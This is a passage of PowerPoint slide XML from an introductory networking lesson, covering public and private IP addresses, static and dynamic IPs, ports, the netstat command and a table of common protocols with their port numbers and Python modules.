            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device-2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A80038-A98D-4393-8FD9-7C20AD00D128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937563" y="3304102"/>
            <a:ext cx="1527982" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>192.168.0.104</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (host)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504584EE-B71A-4EBB-805B-7DBAE33D8DB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9069509" y="3326425"/>
            <a:ext cx="1645002" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>103.227.99.252</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (host)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F04B9F-0F20-4DBD-9964-4314B43401BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4572000"/>
            <a:ext cx="8563306" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two computers can communicate with each other or send a message using IP address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1386410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ADB8A-DA98-4EB3-AD39-D6B7064B5D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365126"/>
            <a:ext cx="10515600" cy="567030"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public &amp; Private IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4FCECFD-3B1E-4681-B2E1-322C3DC65485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692458" y="1580226"/>
            <a:ext cx="10661342" cy="5076132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>– is given by the internet service providers i.e. ISP like Vodafone and AT &amp;T.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Private IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>– is given to you by the router &amp; Wi-Fi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>How to find out both IP addresses ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Public IP -can be found by Google , type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>whats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” or visit the site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://whatsmyip.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Private IP –go to command prompt, for Windows users(ipconfig), Linux or Mac users(ifconfig).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The subsections of Public &amp; Private IP addresses are : Static &amp; Dynamic IP respectively.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30257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BAB2D-13CC-440D-822C-0E335A139D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="451621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static and Dynamic IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{046F6F35-BBA4-4666-80E4-3E209A7C90F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710213" y="1136342"/>
            <a:ext cx="11052699" cy="5721658"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Static IP addresses never change but Dynamic IP addresses always keep changing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Restart your computer and see for yourself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Static IP address are usually found in Servers &amp; websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Servers are nothing but computers which you can hire for some amount of money to do some processing work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Dynamic IP address are usually found in Computer and mobile devices, which basically have to restart lot of time and they are not hosting any files and that is why their IP address are always changing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0321A566-5D16-4668-905D-9E31F0704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7386" y="2488635"/>
            <a:ext cx="4660777" cy="2246077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3665966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DA666-1FE8-42EA-B70C-971399A95D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="487131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to Ports</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6C7D5B-1016-40EF-ABB0-F2D8DAFC0D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1455938"/>
            <a:ext cx="10767874" cy="5138276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You can think of Ports as exact house or apartment number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>So, IP address represent the city &amp; street name whereas, Port no  represent exact house number you are locating in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>So, when a computer tries to connect with another computer, it not only needs IP address but also the Port as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Think about ports as exact room number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Finding open ports using command line –”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –a –b –n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Map with a Red Pin Icon stock vector. Illustration of graphic - 159529757">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D08EE0-5594-4D60-81A9-8F317B255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817" y="5017821"/>
            <a:ext cx="1685278" cy="10912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5AB24E-6E1A-4DE5-AB8A-BB2EFB6D6432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873188" y="5402062"/>
            <a:ext cx="1273426" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8590D6-8D9A-40C0-97DA-1D18C208D6F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5903390" y="5425826"/>
            <a:ext cx="998094" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Port No</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="House Clipart Png - House Clipart - 582x600 PNG Download - PNGkit">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6DEDA1-697A-4327-ABB1-6E9EE35720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907" y="5017820"/>
            <a:ext cx="1315882" cy="1091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1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DB4D14-5A0E-44AB-B3E9-9F95E05F5BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905522" y="932155"/>
            <a:ext cx="8599277"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t>A list of some important modules in Python Network / internet Programming:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9668C74-E2C5-41C2-B5EF-337238FFB87C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3369006715"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="798989" y="1509778"/>
          <a:ext cx="9117368" cy="3337560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{F5AB1C69-6EDB-4FF4-983F-18BD219EF322}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2279342">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1535155046"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2279342">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="219956909"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2279342">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1903744731"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2279342">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="852670381"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Protocol</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Common Function</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Port No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Python Module</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2666452294"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Web pages</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>80</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Httplib,urllib,xmlrpclib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1716687710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>NNTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Usenet news</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>119</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Nntplib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3891471192"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>File transfers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>20</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Ftplib,urllib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3077475322"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>SMTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Sending email</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>25</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Smtplib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
